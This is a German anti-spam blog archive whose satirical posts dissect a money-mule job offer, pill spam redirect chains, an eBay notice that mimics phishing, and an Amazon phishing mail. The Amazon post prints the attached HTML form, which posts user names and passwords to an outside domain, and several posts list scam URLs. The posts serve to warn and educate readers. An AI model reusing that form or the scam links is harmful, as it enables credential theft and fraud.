Schlagwortarchiv „Screenshot“

3 Schritte zum Erfolg

Dienstag, 10. Mai 2016

Oh, an die Gammelfleisch-Adresse für unseriöse Angebote, die hier jeder Vollidiot ganz bequem mit seinem Skript einsammeln kann. Das muss also ein ganz großartiges Erfolgsrezept sein!

Ich reproduziere das „tolle“ HTML-Layout dieser Spam nicht, aber…

Wenn Sie Probleme beim Lesen dieser E-Mail haben, klicken Sie hier für eine Web-basierte Version

…ich habe natürlich einen Screenshot gemacht. Übrigens ist es nett, dass die Spammer noch vor jedem Text erzählen, dass ihr HTML möglicherweise so mies ist, dass es nicht korrekt dargestellt werden kann. Da bekommt man doch Lust zum Weiterlesen…

3 Wege für den aufbau EINER DIGITALEN PRÄSENZ

…zumal einem in diesem von Spammer freiwillig hergestellten Kontext erklärt wird, wie man sich im Internet präsentieren soll.

1
Erstellen sie eine
ERFOLGREICHE HOMEPAGE

Unternehmenspräsentation | Online Shop | Web App & Plattform

Mit Sauberem und einfachem Layout
Liefern Sie eine einfache Benutzerbedienung [sic!] und begleiten Sie ihre Besucher auf dem Pfad des Handels [sic!]…
Benutzen Sie Flat Design
Dies bietet Ihnen schnellere Ladezeiten, ist
einfach zu bedienen, und gibt Ihrer Webseite
einen sauberen Look.
Fokus auf Mobile Geräte
57% der Benutzer empfehlen ein Gescheft [sic!]
NICHT weiter wenn es nich [sic!] Mobile Optimiert [sic!]
ist

BENÜTZEN SIE UNSEREN SERVICE

Toll ist es aber auch, dass die Idioten mir erklären, wie ich eine Homepage zu gestalten habe, auf der ich mich präsentiere, etwas verhökere und eine App-Plattform [!] zur Verfügung stelle. Mit ganz einfachem Layout nach dem Maßstab von Idioten, die in ihre illegalen Spams offen reinschreiben, dass ihre eigenen Spams ein dermaßen kompliziertes Layout haben, dass es zu Darstellungsfehlern kommen kann. Vielleicht erklärt ihnen mal jemand, dass man auch einfache Textmail schreiben kann. Aber das nützt nichts, denn die haben schon weggehört, als ihnen jemand erklärt hat, dass Spam asozial und illegal ist.

Übrigens: Nach einer durch keinen Link belegten Studie, die ich mir eben höchstpersönlich ausgedacht habe und aus der Korrelation meines Bauchgefühls mit dem Menschenverstand erarbeitet habe, gilt, dass mindestens 90 Prozent der Besucher einer kommerziellen Website sofort Abstand von jedem Geschäft nehmen, wenn sich die Betreiber nicht einmal die Mühe machen, eine Rechtschreibprüfung¹ über ihre Texte laufen zu lassen. Die grammatischen Schwächen der Marke „Mobile Geräte“ – man schreibt Eigenschaftswörter auch dann nicht groß, wenn man sie für wichtig hält – können darüber hinaus leicht unerwünschte Assoziationen wecken.

Aber Hauptsache bleibt ein sauberer Look.

Ach übrigens: Wenn diese zertifizierten Hohlnieten wenigstens elementare Ahnung von der Sache hätten, die sie ihren Opfern anbieten, würden sie nicht immer harte Zeilenumbrüche in ihr Geschreibsel machen.

2
Entwickeln sie ein
INTERAKTIEVES MOBILE-APP
Firmen Apps | Spiele | iOS | Android | Windows | Symbian

Was, ich soll das entwickeln? Dann brauche ich diese spammenden Halunken ja gar nicht mehr. 😀

Verstehen Sie Ihre Zielgruppe und Ihre Konkurenz
Erkennen Sie Ihre einzigartige Wertposition [sic!]. Werden Sie besser und Wettbewerbsfähiger als Ihre Konkurrenz.
Profitieren Sie von
Smartphone-Funktionalität
Liefern Sie einzigartige Funktionalität und
Inhalt, dass auf einer Mobilen Web nicht zu
finden ist [sic!].
Liefern sie einen Komplexen Design & Benutzeroberfläche
Native Apps liefern maßgeschneiderte Benutzererfahrungen.

Arbeiten Sie mit
UNSEREN ENTWICKLER

Die Frage, was eine Marktanalyse sowie die üblichen Irrtümer über den eigenen Wert und die eigene Bedeutung mit Software für Smartphones zu tun hat, kann leider nur der Mitmensch beantworten, der diesen tollen Text geschrieben hat.

Man beachte: Oben gibt es noch eine „einfache Benutzerbedienung“, aber jetzt gibt es „komplexes Design & Benutzeroberfläche“. Das ist schon dumm, wenn man mit den Gedanken so sehr im Bordell ist, dass die Konzentration nicht für anderthalb Seiten Text hinreicht. Dann schleichen sich halt solche Inkosistenzen ein. Einem durchschnittlich begabten Siebtklässler wäre das in einem Aufsatz so sicherlich nicht passiert. Aber wer in der Schule etwas mitgenommen hat, muss ja auch nicht spammen.

Ein gülden gleißender Bullshitbingopunkt für „Benutzererfahrungen“. ❗

Mein Beileid gilt dem einen Entwickler, der dort die ganze Arbeit macht und zwar schon – wie wir gleich noch lesen werden – seit Jahrhunderten.

Ich habe bislang übrigens erst eine „Benutzererfahrung“ mit dieser völlig namenlosen Unternehmung voller Spezialexperten gemacht: Illegale und asoziale Spam.

3
Werben sie
ONLINE
Online Kampagnen | Facebook Adds | Google Adwords | E-Mail Marketing

Ah, endlich die tollste Aufforderung: Werben sie doch auch mit Spam auf allen Kanälen! Genau das richtige für jeden, der seine Reputation nachhaltig in die Tonne treten will.

Optimieren Sie Ihre Website für Suchmaschinen
Mit einem höheren Rang auf Google bringen Sie mehr Benutzer auf ihre Webseite.
Nutzen Sie Soziale Netzwerke
Benutzen Sie Soziale Netzwerke um neue Gelegenheiten zu entdecken wie man ihre
Besucherernummer [sic!] steigern kann.
Verstehen Sie die Nützlichkeit des E-Mail Marketings
Kommunizieren Sie relevante Informationen über Ihre Produkte und Dienstleistungen durch Email Marketing..

Kontaktieren sie
unsere experten

Na, wer auf diese „Besuchernummer“ reinfällt, dem ist auch nicht mehr zu helfen.

Mehr als 2mil. stunden erfahrung im
umsetzen von Projekten von idee bis zum endreSultat [sic!]

Moment mal… *tacker tacker tacker*

$ bc
2000000/24/365
228

Über 228 Jahre Erfahrung! Viel mehr als jedes andere Unternehmen, das Dienstleistungen im Web- und Internetbereich anbietet!

Versuchen sie unsere dienstleistungen noch jetzt

Och… nö!

Diese E-Mail wurde gesendet an gammelfleisch@tamagothi.de, unter Beachtung der gesetzlichen Rechte
in Bezug auf E-Mail-Marketing-und Datenschutzgesetze in Europa.Wenn man bedenkt,
dass diese E-Mail Ihnen Fehlerhaft gesendet wurde, so informieren Sie uns bitte
so bald wie möglich. Um Ihre E-Mail aus der Mailingliste zu entfernen, klicken Sie hier.

Diese E-Mail ist eine illegale und asoziale Spam. Die Absender sind Kriminelle. Wenn man bedenkt, wie viel „Freude“ man haben kann, wenn man mit denen „zusammenarbeitet“, trifft sich jede Entscheidung wie von allein.

¹Ich gebe allerdings zu, dass ich mir diese „Mühe“ auch nicht mache. Aber ich will auch niemanden etwas verkaufen. Hoffentlich ist der Anteil von Flüchtigkeitsfehlern und groben Kenntnislücken in meinem Geschreibe für Leser noch erträglich.

Über Empfehlung: Nebenjob-Anfrage

Samstag, 16. April 2016

Guten Tag Eli ,

Nahe dran. Aber ist trotzdem nicht mein Name.

derzeit suchen wir Mitarbeiter (m/w) für leichte Nebentätigkeiten, bequem von zu Hause aus.

Oh, hat die Kripo euch alle angeheuerten Briefkästen und Geldwäscher weggeschappt?

Wir bieten Ihnen:
– Flexible Arbeitszeiten / freie Zeiteinteilung
– Arbeiten von zu Hause aus
– Mit ca. 5/10 Stunden pro Woche 500-900 Euro möglich

Jeder, der eine Anschrift in der BRD hat und Zahlungen auf sein Konto empfangen kann, kann auch diesen „Nebenjob“ als Muli machen.

Oder soll man wieder mal Roulette spielen?

Kein Verkauf, keine unseriösen Tätigkeiten – informieren Sie sich unverbindlich:

Ist auch voll seriös, kommt ja nur mit einer illegalen und asozialen Spam. Und beliebt ist der „Job“! Ich habe das Angebot viermal in der Spamsenke. Der „Job“ muss ja nur so weggehen!

http://www.weiter-97.site/

So so, weiter (strich) 97 – der Spammer macht ja nicht mal im Domainnamen einen Hehl draus, dass es sich um eine reine Wegwerfdomain handelt, die dann auf die Betrugsseite weiterleiten soll.

$ lynx -mime_header http://www.weiter-97.site/
HTTP/1.1 301 Moved Permanently
Date: Sat, 16 Apr 2016 11:56:29 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.45-0+deb7u2
Location: http://www.richpro.de/partner/partnerdoor.php?partnerid=15&bannerid=29
Connection: close
Vary: Accept-Encoding
Content-Length: 3
Content-Type: text/html

   $_

Aha, eine Weiterleitung mit Affiliate-ID. Der Spammer lebt also nicht etwa von den tollen „Jobs“, die er in Spams feilbieten muss, sondern davon, dass er anderen Leuten Opfer zutreibt und dafür ein paar Judasgroschen gibt. Das muss folglich einträglicher als diese „Nebenjobs“ sein, denn sonst würde er gewiss einen dieser „Nebenjobs“ machen.

Und richpro (punkt) de ist eine Domain, die schon mit ihrem Namen nichts Gutes verheißt. Laut DeNIC gehört sie einer „Richpro Internet GmbH“ aus der BRD. Die Reputation im „Web of Trust“ spricht für sich, und eine kurze Websuche vervollständigt schnell den Eindruck, den ich wegen des in der BRD geltenden, vollumfänglichen Rechtsschutzes für beleidigte Leberwürste nicht noch mit eigenen Worten ergänzen möchte. Von der Reichwerdmethode über die Schlankheitspille bis zum Doktortitel gibt es da augenscheinlich alles – und auch Pr0n wird nicht verschmäht. Immer schön über illegale und asoziale Spam vermarktet, versteht sich. Manchmal finde ich es ein bisschen schade, dass die Meteroiten immer an den falschen Stellen runterfallen.

Was es dort wohl geben wird?

$ lynx -mime_header "http://www.richpro.de/partner/partnerdoor.php?partnerid=15&bannerid=29"
HTTP/1.1 301 Moved Permanently
Date: Sat, 16 Apr 2016 12:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: PSL1391604664=ee5d9a0dc75653f4894898e12ea0cb91; path=/
Set-Cookie: sprache_display=de; expires=Wed, 15-Jun-2016 12:01:57 GMT
Set-Cookie: Partner-ID=15; expires=Wed, 15-Jun-2016 12:01:57 GMT
Set-Cookie: Banner-ID=29; expires=Wed, 15-Jun-2016 12:01:57 GMT
Set-Cookie: Sub-ID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Set-Cookie: Timestamp=1460808117; expires=Wed, 15-Jun-2016 12:01:57 GMT
Location: http://ban.go2cloud.org/aff_c?offer_id=251&aff_id=5029&aff_sub=Aff15
Vary: User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

$ _

Richtig, die nächste Weiterleitung. Diesmal werden allerdings ein paar Cookies in den Browser gemacht, damit Opfer wiedererkannt werden können – und die Affiliate-ID wird umgeschrieben. Man könnte angesichts dieser Nutzungsform denken, dass die Website unter der Domain richpro (punkt) de in erster Linie dazu dient, die richtigen Affiliate-IDs von asozialen und illegalen Spammern zu verschleiern, indem sie einfach umgeschrieben werden.

Und was hat go2cloud (punkt) org nun anzubieten:

$ lynx -mime_header "http://ban.go2cloud.org/aff_c?offer_id=251&aff_id=5029&aff_sub=Aff15"
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 16 Apr 2016 12:15:25 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: http://auto-profit-replicator.xyz/?tp=H420f37s&tparam1=1025c7b48f53eb8e774341db9a5855&subID=5029
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_251=ENC02104-1025c7b48f53eb8e774341db9a5855-5029-251-0-0-0-0-DE-0-_-4166663135-_-_-_-_-92.77.88.16-20160416081525-_-223C613D710C396431261B2160574F1A1B4E4042540B510F145B19536E507F42440D330E705D7C5D65; expires=Mon, 16 May 2016 12:15:25 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX21vZGVsIjoiQnJvd3NlciIsIm1vYmlsZV9kZXZpY2VfYnJhbmQiOiJMeW54IiwibW9iaWxlX2NhcnJpZXIiOiI/IiwidXNlcl9hZ2VudCI6Ikx5bngvMi44LjhwcmUuNCBMaWJ3d3ctRk0vMi4xNCBTU0wtTU0vMS40LjEgR05VVExTLzIuMTIuMjMiLCJhY2NlcHRfbGFuZ3VhZ2UiOiJlbiIsImNvbm5lY3Rpb25fc3BlZWQiOiJ4ZHNsIn0=; expires=Mon, 11 Mar 2019 22:55:25 GMT; path=/;
tracking_id: 1025c7b48f53eb8e774341db9a5855
X-Robots-Tag: noindex, nofollow
Content-Length: 288
Connection: Close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://auto-profit-replicator.xyz/?tp=H420f37s&tparam1=1025c7b48f53eb8e774341db9a5855&subID=5029">here</a>.</p>
</body></html>
$ _

Richtig! Die nächste Weiterleitung. Nichts mögen Spammer so wenig wie einen direkten Link…

Aber immerhin, jetzt sind wir endlich am Ziel:

Nein, der „Auto Profit Replicator“ ist kein „Replikator“ aus dem Star-Trek-Universum. Es ist eine Website, die keinerlei Text enthält, sondern nur ein eingebettetes Video, in dem eine gesichtslose Stimme 36 Minuten lang recht professionell das Gehirn so weichlabert, dass es ausgelöffelt werden kann. Also im Grund der gleiche Bullshit wie bei dem GeldProgramm™. Nur, dass es diesmal nicht mehr aus dem ZDF bekannt ist, sondern von Yahoo Finanzen – aber die Logos von irgendwelchen Unternehmen mit größerer Seriosität als die eines Spammers kann sich der Spammer ja einfach und bequem aus dem Internet einsammeln.

Und naürlich: Jeder wird reich werden, indem er mit Software Wettzettel auf beliebige Börsenereignisse, so genannte Binäre Optionen, handelt. Jede gut dressierte Laborratte könnte das. Man muss gar nichts dafür können. Der Spammer freilich, er lebt lieber nicht von seiner lang und weilig im Video feilgebotenen Methode, sondern davon, dass er Affiliate-Gelder dafür kriegt, Brokern neue Kunden zuzutreiben.

Und das sagt wohl alles über diese Methode, was gesagt werden muss.

Das bisschen Mühe, für die Anpassung an den deutschsprachigen Markt noch ungebrannter Kinder mal schnell das Dollarzeichen aus dem Logo durch ein hier angemesseneres Währungssymbol zu ersetzen, war dem Spammer bei seiner Nummer zu viel Mühe. Denn wenn er sich Mühe geben würde, könnte er doch gleich arbeiten gehen, und diese ganze Anstrengung…

Mit freundlichen Grüßen,

Matthias Maier
Personalabteilung

Auch bekannt unter den Namen…

Jens Winter
Personalabteilung

…und…

Mario Pohl
Personalabteilung

…und…

Malte Schulte
Personalabteilung

Aber hey, was soll an so einem Kleinkram schon beunruhigen. Es geht ja nur um Geld.

Hallo eBay, ist noch alles knusper bei euch‽

Freitag, 15. April 2016

Nutzer der Handy-App von eBay¹ können den folgenden Hinweis in ihrer App sehen:

Screenshot der eBay-App. Im unteren Bereich ist ein Overlay mit folgendem Text eingeblendet: 'Helfen Sie uns, Ihr eBay-Konto zu schützen (Link) Bestätigen Sie Ihre persönlichen Daten'.

Helfen Sie uns, Ihr eBay-Konto zu schützen
Bestätigen Sie Ihre persönlichen Daten

Es handelt sich hier nicht um einen Phishing-Versuch.

Ich war mir auf dem ersten Blick völlig sicher, dass es Phishing ist, und meine einzige Frage war, wie die Phisher es wohl geschafft hätten, ihre Phishing-Einleitung als Overlay in die eBay-App einzublenden. (Ich halte es nicht für unmöglich, dass Kriminelle solche Möglichkeiten finden und ausnutzen – Smartphones sind leider sehr gefährliche und für kriminelle Versuche sehr offene Geräte.)

Ich habe mich (zum Glück) getäuscht.

Diese Meldung kommt wirklich von eBay. Und diese Meldung ist wirklich sehr dumm gestaltet, denn sie drückt bei ihren Empfängern auf die gleichen psychologischen Knöpfe wie typische Phishing-Mails:

Bereits bekannte Kundendaten sollen noch einmal bestätigt werden;
dies soll nicht etwa über einen von der Mitteilung unabhängigen Aufruf der eBay-Website, sondern über einen Link geschehen; und
es ist wegen „der Sicherheit“, wegen „des Schutzes des Kontos“ erforderlich.

Das ist – wenn man einmal von dem von Phishern gern angewendeten zusätzlichen Druckmittel einer Fristsetzung oder aufkommender Kosten absieht – genau die gleiche Ausdrucksweise, mit der Menschen sonst dazu gebracht werden sollen, ihre Konten und persönlichen Daten der Organisierten Kriminalität zur Verfügung zu stellen, indem sie die Zugangsdaten in schnell aufgeschäumten Webseiten im Design der entsprechenden Unternehmen eingeben und absenden. (In jüngerer Zeit wird auch häufig ein HTML-Dokument an die E-Mail angehängt, das man ausfüllen und absenden soll – mit gleichem Ergebnis.)

Auch die unter diesem Link hinterlegte Seite sieht so aus, wie ich es von der ersten Seite eines Phishing-Versuches gewohnt bin, der zunächst Accountdaten haben will, bevor weitere Dateneingaben (Anschrift, Bankverbindung, Kreditkarte) erschlichen werden [die unkenntliche Telefonnummer im Screenshot ist nicht von eBay]:

Screenshot der eBay-Seite zur Datenbestätigung -- Helfen Sie uns, Ihr eBay-Konto zu schützen -- Für noch mehr Sicherheit vergewissern Sie sich bitte, dass Ihre personenbezogenen Daten auf dem aktuellen Stand sind. -- E-Mail -- Mobiltelefon

Und genau das führt eBay gegenüber seinen Kunden als gewöhnliche Form der Kommunikation von eBay zum Kunden ein. Ganz so, als sei das Problem mit Phishing noch nicht groß genug; als müsse man seine Kunden zudem daran gewöhnen, dass genau die gleichen Kommunikationsmuster aus typischen Betrugsmails eine gewöhnliche Form der geschäftlichen Kommuniaktion seien und den Betrug auf diese Weise mit Autorität und Glaubwürdigkeit „aufladen“.

Das erschwert die sichere Erkennung von Phishing und zerstört den Schutz durch einen mit ungewöhnlichen Vorgängen und Aufforderungen aufkommenden Verdacht.

Die Folgen dieser dummen Entscheidung eBays werden nicht lange auf sich warten lassen – arglose Nutzer werden vermehrt auf Phishing-Mails hereinfallen, da sie ihren Stil für einen authentischen eBay-Stil halten. Dies gilt in besonderer Weise, als dass den Kriminellen eine sehr umfangreiche Datenbank mit Mailadressen und Accountdaten zur Verfügung steht, die bei eBay benutzt wurden oder noch werden. (Siehe zur Vorgeschichte dieses Datenlecks meine vorsichtig formulierte Mutmaßung hier auf Unser täglich Spam, als auf einmal hochgefährliches eBay- und PayPal-Phishing in Mail an exklusiv für eBay und PayPal benutzte Mailadressen auftauchte.)

eBay führt sich gerade wie ein Freund und Förderer der Organisierten Kriminalität auf; ganz so, als wollte eBay Phishing zu einem Erfolgsrezept für gewerbsmäßige Betrüger machen.

Das ist schlecht. Und es sollte geändert werden.

Von eBay.

So schnell wie möglich, am besten sofort!

¹Ein Dank für die Screenshots und den Hinweis geht an meinen Leser M.S.

Re:

Mittwoch, 30. März 2016

Tja, mit den Worten hat es dieser Spammer nicht so, stattdessen „erfreut“ er seine Empfänger mit einem 55,3 KiB schweren Bildchen, das deutlich weniger als tausend Worte sagt:

Abbildung einer Medikamentenflasche mit Etikett 'VigRX for Men, oral', an der Medikamentenflasche ein 'Product Security Seal', dass dazu auffordert, auf einer Website sechzehn Neunen einzugeben, um die Echtheit des Produktes zu prüfen, dazu der Text 'Natürlich und effektiv. Die erste Wahl seit 2001. Offizielle Website von VigRX.

Ich mag ja das Spamsiegel mit den vielen Neunen, das mir ermöglicht, die Echtheit zu überprüfen – hier noch einmal etwas vergrößert und dadurch leider verwaschen, aber in seiner Peinlichkeit viel deutlicher:

Detail aus der Spam. Das Siegel. 'Visit VigRX.com & input code -- Check Authenticity -- 9999 9999 9999 9999 -- LeadingEdge Health -- Product security seal

Ob die so angepriesene Pimmelpille wirklich etwas für den Pimmel tut, kann ich natürlich nicht sagen, aber zur Förderung zur Selbstmassage des Zwerchfells ist sie nicht schlecht.

Nach diesem Einblick in die von sechzehn Neunen besiegelte Echtheit des Produktes noch ein weiterer Blick in seine Präsentation im Web – natürlich nehme ich aus naheliegenden Gründen keinen „richtigen“ Browser dafür, sondern schaue mir auf der Kommandozeile an, was einem Besucher unbemerkt alles zugemutet wird. In den folgenden Zeilen habe ich stark gekürzt, um die endlosen Javascript-, Tracker- und Zählerwüsten zu ersparen¹:

$ lynx -mime_header http://www.exelorio.biz.ua/exelorio/index.html
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2016 06:41:46 GMT
Content-Type: text/html
Content-Length: 1496
Connection: close
Last-Modified: Tue, 29 Mar 2016 14:59:18 GMT
ETag: "37c0390-5d8-52f314605d690"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!-- Rd. dreißig Zeilen Javascript entfernt -->
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=
http://www.exelorio.biz.ua/medipreise/index.html">
$ _

Tja, so ist das eben, wenn man eine „offizielle Website“ aus der Spam besucht – das ist niemals ein direkter Link, sondern immer eine alles verschleiernde Weiterleitungswüste. Und nein, mit einer Weiterleitung ist es nicht genug. Auch hier habe ich wieder stark gekürzt:

$ lynx -mime_header http://www.exelorio.biz.ua/medipreise/index.html
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2016 06:49:02 GMT
Content-Type: text/html
Content-Length: 1488
Connection: close
Last-Modified: Tue, 29 Mar 2016 14:58:52 GMT
ETag: "37c038e-5d0-52f31448237bd"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!-- Rd. dreißig Zeilen Javascript entfernt -->
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=
http://www.medipreise.info/#!vigrx/q5zpo">

$ _

Ob es wohl gleich noch eine Weiterleitung gibt?

$ lynx -mime_header 'http://www.medipreise.info/#!vigrx/q5zpo' | sed '/^\s*$/q'
HTTP/1.1 200 OK
Cache-Control: max-age=0, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Wed, 30 Mar 2016 07:01:18 GMT
ETag: ffca9f612019e88c0c0b71d1b0c10a32
Expires: -1
Pragma: no-cache
Server: Pepyaka/1.9.9
Vary: User-Agent,Accept-Encoding
Via: 1.0 username.wix.com
X-Seen-By: /0b3tu7BwMUubvM+8DFnyIZhbXxmdS0SoYtN65Ns3dwVg8yBNrCddpK11/FwIFN7,LwsIp90Tma5sliyMxJYVEimxe5u57vJkW8Ut+ygV+W3naXGSE7xQP0F5eUkr7UI2,Tw2AanFDQ+Wwo8Xxk6ZL7rHKeAJXtkPxqn+uc4aMlOC9TZSDiwEgQLyYAOfMlNNfnUoPRWylvzmW1WtoYIgS/A==,9/zAiwmuIQ5G9xgIqi9IpfKjiM3HhjsT5sK9PwlANII=
X-Wix-Renderer-Server: app205.vae.aws
X-Wix-Request-Id: 1459321278.2271453355868244144
Content-Length: 16073
Connection: Close

$ _

Aber nein. Damit sind wir endlich am „Ziel“ angekommen – auf einer tollen Seite mit dem tollen Titel „Preisvergleich in Apotheken“, die so stark auf Javascript setzt, dass sie ohne Javascript fast nichts mehr anzeigt. Weil der Spammer es nicht so mit Technik hat und das Internet eigentlich nur zum Spammen verwenden möchte, wurde diese Seite schnell mit dem kostenlos nutzbaren „Website Builder“ unter wix (punkt) com zusammengeklickt², dessen Website einem eventuellen Besucher ohne Javascript übrigens auch gar nichts zu sagen hat, nicht einmal ein Impressum ist verfügbar. Dafür gibts wenigstens ein Video. Hier bekommt die „Generation Jamba“ die Gelegenheit geboten, sich ins Web zu entfalten… ach! 🙁

So, jetzt aber zum gülden gleißenden Glanzstück der flüchtigen Recherche. Hier ist der Inhalt der Website der Spamkünstler, zusammengesetzt aus etlichen Quellen, technisch realisiert mit wix (punkt) com, inhaltlich hochreiner Bullshit, dargestellt in einem Firefox mit abgeschaltetem Javascript:

VigRX

VigRX™ ist ein ganzheitliches [Bingo!] und natürliches [Bingo!] Nahrungsergänzungsmittel zur Stärkung der männlichen Potenz und zur Steigerung der Penisgröße [Bingo!]. Es liefert wichtige Vitamine [Bingo!] und Nährstoffe [Bingo!] und optimiert [Bingo!] hierdurch die Durchblutung im Genitalbereich, was zu härteren und länger anhaltenden Erektionen führt. Die Wirkung fördert [Bingo!] zudem das körpereigene Zellwachstum [Bingo!] im Penis und setzt somit ein natürliches Peniswachstum [Bingo!] in Gang.

Willkommen auf der offiziellen Webseite von VigRX™. | 5% OFF Code: XXQRT8

© 2016 Die günstigsten preise [sic!]

Nun, ich wünsche guten Appetit mit dem ganzheitlichen und natürlichen Nahrungsergänzungsmittel, das den Pimmel länger macht. Der Link auf die „offizielle Website“ ist über Googles URL-Kürzungsdienst maskiert, weil Spammer nun einmal keine direkten Links mögen und weil so…

$ lynx -mime_header http://goo.gl/nvzC2D | sed '/^\s*$/q'
HTTP/1.0 301 Moved Permanently
Strict-Transport-Security: max-age=10886400;
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Wed, 30 Mar 2016 09:32:38 GMT
Location: http://track.healthtrader.com/track.php?c=cmlkPTEwMDU5MyZhaWQ9NTAwMTAxNjI
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Accept-Ranges: none
Vary: Accept-Encoding

$ _

…die angehängte Affiliate-ID weniger auffällt. Auf der Zielseite gibt es übrigens keinerlei Inhalte, die man ohne Flash und Javascript betrachten könnte – und ein in einem sicher konfigurierten Browser sichtbares Impressum gibt es auch nicht. Aber wozu denn auch, es geht ja nur um die Gesundheit. 😈

¹Die gelegentlich sichtbare Pipe auf sed ist dafür da, die Ausgabe nach den HTTP-Headerzeilen (also nach der ersten Leerzeile) abzubrechen. Für die Syntax von sed kann ich nichts, außer vielleicht sagen, dass es nicht halb so schlimm ist, wie es aussieht – aber oft sehr nützlich. Der eingefügte Kommentar mit dem Hinweis auf eine Löschung ist natürlich von mir.

²Natürlich kann der mir unbekannte Betreiber von wix (punkt) com nichts dafür, dass ein derartiges Angebot auch von Vollidioten wie diesem Spammer genutzt wird. Eine auch in einem sicher konfigurierten Browser sichtbare Kontaktadresse für die Meldung eines Missbrauches hätte ich gut gefunden, das Fehlen einer solchen Kontaktadresse halte ich für ein Zeichen, dass man von diesem Dienst unbedingt die Finger lassen sollte. Außer natürlich, man ist Spammer und möchte mit seinen grenzkriminellen oder offen kriminellen Webauftritten nicht vorzeitig aus dem Web entfernt werden… dafür bietet wix (punkt) com in der momentanen Form ein ideales Biotop.

Ihr Amazon-Konto wurde ausgesetzt

Mittwoch, 23. März 2016

Und ich habe doch gar keines… 😉

Von: amazon (punkt) powering (at) msg (punkt) afterbuy (punkt) de
An: gammelfleisch (at) tamagothi (punkt) de

Diese Spam geht an alle möglichen aus dem Internet eingesammelten Adressen, und der Spammer fälscht zwar den Absender, ist aber zu doof dazu, es so zu machen, dass der Absender auch wirklich nach Amazon aussieht. Aber zum Ausgleich…

Hallo von Amazon-Sicherheit,

…sieht die Anrede auch nicht ganz so überzeugend aus. 😀

Hier ist eine wichtige Nachricht von Amazon.de. Bitte lesen Sie diese Nachricht sorgfaeltig durch, da sie Ihr Kundenkonto bei Amazon.de betrifft.

Wir ueberpruefen routinemaessig Kundenkonten. Bei der Pruefung Ihres Kundenkontos erhaertete sich leider unser Verdacht, dass ein Unberechtigter Zugriff auf dieses hatte.

Aus diesem Grund haben wir Ihr Kundenkonto voruebergehend gesperrt. Niemand kann derzeit auf Ihr Kundenkonto zugreifen, Sie eingeschlossen.

Oh, wie bitter! Amazon nimmt jetzt wohl auf seiner Website über eine noch völlig unbekannte Schnittstelle den Besuchern Fingerabdrücke ab, und wenn jemand das richtige Passwort eingibt, aber den falschen Fingerabdruck hat, dann wird einfach der Account gesperrt. Und es gibt nur eine einzige Möglichkeit, was man dagegen tun kann:

Um Ihr Kundenkonto zu entsperren, befestigt auf diesem E-Mail [sic!] sie haben das Formular.

Bitte laden Sie das Formular und geben Sie Ihre Daten.

Man muss den Anhang einer E-Mail öffnen, die von Unbekannten mit gefälschtem Absender und voller falscher Behauptungen in recht fragwürdigem Deutsch versendet wurde. Auch, wenn da diesmal keine Schadsoftware dranhängt¹, sondern nur ein krimineller Versuch, an die Passwörter anderer Leute zu kommen, ist das Öffnen von unverabredeten Anhängen in E-Mails immer eine ganz schlechte Idee.

Übrigens sieht das Formular im angehängten HTML-Dokument – was nach der stümperhaft formulierten Phishing-Spam gar nicht zu erwarten war – recht gut aus:

Das gesamte Design besteht nicht etwa aus Texten, sondern ist ein großes Bild, das bei einem anonym nutzbaren, kostenlosen Bildupload-Dienst hinterlegt wurde. Natürlich habe ich directupload (punkt) net schon mit einer Mail darauf hingewiesen, dass der Dienst von Spammern missbraucht wird und erwarte deshalb eine baldige Löschung dieses Blendwerkes. Leider ist das nur ein Tropfen auf dem heißen Stein; ein neues Bild ist schnell hochgeladen und ein paar Millionen Spams sind schnell versendet, der Schaden wird schnell seine naiven Opfer auf anderem Wege finden. 🙁

Was auch immer man in diesem angehängten HTML-Dokument eingibt, geht nicht etwa zu Amazon, sondern…

<form method="post"
action="http://www.desentupidoraapolinario.com.br/zmd/404.php">
<input
style="top: -83px; height: 17px; left: -949px; width: 223px;"
id="user" name="user" value="" type="text" required/>
<input style="top: -99px; height: 17px; left: -949px; width: 223px;"
id="pass" name="pass" value="" type="password" required/><input
style="top: -123px; height: 20px; left: -890px; width: 165px;"
id="submit" name="submit" value="" type="submit">
</form>

…wird an eine deutlich weniger Vertrauen erweckende Domain gesendet. Aber das ist ja auch gar keine Überraschung, denn es handelt sich um eine Spam.

Und nein: Es kann nicht dazu kommen, dass eine ähnliche Mail einmal „echt“ ist. Solche E-Mails sind immer Phishing-Versuche. Amazon versendet keine E-Mail mit Anhängen, in denen Formulare liegen, in denen der Empfänger sein Passwort eingeben soll, und übrigens auch keine mit Links auf derartige Formulare. Und genau das Gleiche gilt für jeden anderen Anbieter von Webdiensten. Und natürlich auch für jede Bank. Und einfach nur generell. Die einzigen Menschen, die so etwas machen, sind Kriminelle.

Es ist also gar nicht so schwierig, nicht darauf hereinzufallen.

